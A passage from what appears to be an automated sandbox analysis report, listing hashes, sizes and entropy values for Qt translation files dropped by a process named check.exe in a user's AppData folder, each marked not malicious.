                                                                                                                                                                                                                                      Entropy (8bit):5.189558605179696
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                                                      MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                                                      SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                                                      SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                                                      SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10599
                                                                                                                                                                                                                                      Entropy (8bit):5.192287379770591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                                                      MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                                                      SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                                                      SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                                                      SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7444
                                                                                                                                                                                                                                      Entropy (8bit):4.580794980254807
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                                                      MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                                                      SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                                                      SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                                                      SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):15297
                                                                                                                                                                                                                                      Entropy (8bit):4.708378368926237
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                                                      MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                                                      SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                                                      SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                                                      SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4795
                                                                                                                                                                                                                                      Entropy (8bit):4.530246422531362
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                                                      MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                                                      SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                                                      SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                                                      SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7570
                                                                                                                                                                                                                                      Entropy (8bit):4.550982634910665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                                                      MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                                                      SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                                                      SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                                                      SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10704
                                                                                                                                                                                                                                      Entropy (8bit):4.481291573289571
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                                                      MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                                                      SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                                                      SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                                                      SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10922
                                                                                                                                                                                                                                      Entropy (8bit):4.459946393010639
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                                                      MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                                                      SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                                                      SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                                                      SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10891
                                                                                                                                                                                                                                      Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                                                      MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                                                      SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                                                      SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                                                      SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10284
                                                                                                                                                                                                                                      Entropy (8bit):4.674501432335502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                                                      MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                                                      SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                                                      SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                                                      SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10612
                                                                                                                                                                                                                                      Entropy (8bit):4.458970627057882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                                                      MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                                                      SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                                                      SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                                                      SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7917
                                                                                                                                                                                                                                      Entropy (8bit):5.680408580146589
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                                                      MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                                                      SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                                                      SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                                                      SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5708
                                                                                                                                                                                                                                      Entropy (8bit):5.698914195742074
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                                                      MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                                                      SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                                                      SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                                                      SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9673
                                                                                                                                                                                                                                      Entropy (8bit):4.622652249027856
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                                                      MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                                                      SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                                                      SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                                                      SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7288
                                                                                                                                                                                                                                      Entropy (8bit):5.297177914619657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                                                      MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                                                      SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                                                      SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                                                      SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                      Entropy (8bit):4.70568613551943
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                                                      MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                                                      SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                                                      SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                                                      SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10363
                                                                                                                                                                                                                                      Entropy (8bit):4.613473842638716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                                                      MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                                                      SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                                                      SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                                                      SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4629
                                                                                                                                                                                                                                      Entropy (8bit):4.68793836539357
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                                                      MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                                                      SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                                                      SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                                                      SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9750
                                                                                                                                                                                                                                      Entropy (8bit):5.281035122342072
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                                                      MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                                                      SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                                                      SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                                                      SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6441
                                                                                                                                                                                                                                      Entropy (8bit):5.790303416386852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                                                      MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                                                      SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                                                      SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                                                      SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9301
                                                                                                                                                                                                                                      Entropy (8bit):5.80411750798786
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                                                      MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                                                      SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                                                      SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                                                      SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                                                      MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                                                      SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                                                      SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                                                      SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                                                      MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                                                      SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                                                      SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                                                      SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.599979504080125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                                                      MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                                                      SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                                                      SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                                                      SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.652277257665055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                                                      MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                                                      SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                                                      SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
